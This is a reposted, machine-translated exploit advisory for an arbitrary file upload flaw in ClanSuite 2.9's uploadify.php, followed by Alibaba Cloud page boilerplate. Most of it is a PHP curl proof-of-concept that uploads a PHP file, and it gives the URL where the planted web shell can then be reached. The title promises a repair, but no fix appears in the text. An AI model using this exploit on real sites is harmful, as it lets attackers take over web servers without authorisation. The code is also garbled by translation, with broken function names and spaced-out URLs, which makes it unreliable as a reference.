ClanSuite 2.9 Arbitrary File Upload Vulnerability and repair

Source: Internet
Author: User

Title: ClanSuite 2.9 Arbitrary File Upload
 
Discoverer: Adrien Thierry
 
Program developer http://clansuite.com/
 
: Https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/
 
Affected Versions: 2.9 and Trunk Revision 6400
 
Defect address: uploads/uploadify. php
 
Test Method
 
<? Php
 
$ U = "C: \ Program Files (x86) \ EasyPHP-5.3.9 \ www \ info. php ";
 
$ C = curl_init ("http: // www.2cto.com/uploads/uploadify. php"); // Version 2.9
 
$ C = curl_init ("http: // www.2cto.com/application/uploads/uploadify. php"); // Version trunk
 
Curl_setopt ($ c, CURLOPT_POST, true );
 
Curl_setopt ($ c, CURLOPT_POSTFIELDS,
 
Array ('filedata' => "@ $ u ",
 
'Name' => "info. php "));
 
Curl_setopt ($ c, CURLOPT_RETURNTRANSFER, 1 );
 
$ E = curl_exec ($ c );
 
Curl_close ($ c );
 
Echo $ e;
 
?>
 

 
Shell location:
Http://www.bkjia.com/uploads/temps/info. php
 
Or http://www.bkjia.com/application/uploads/temps/info. php
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.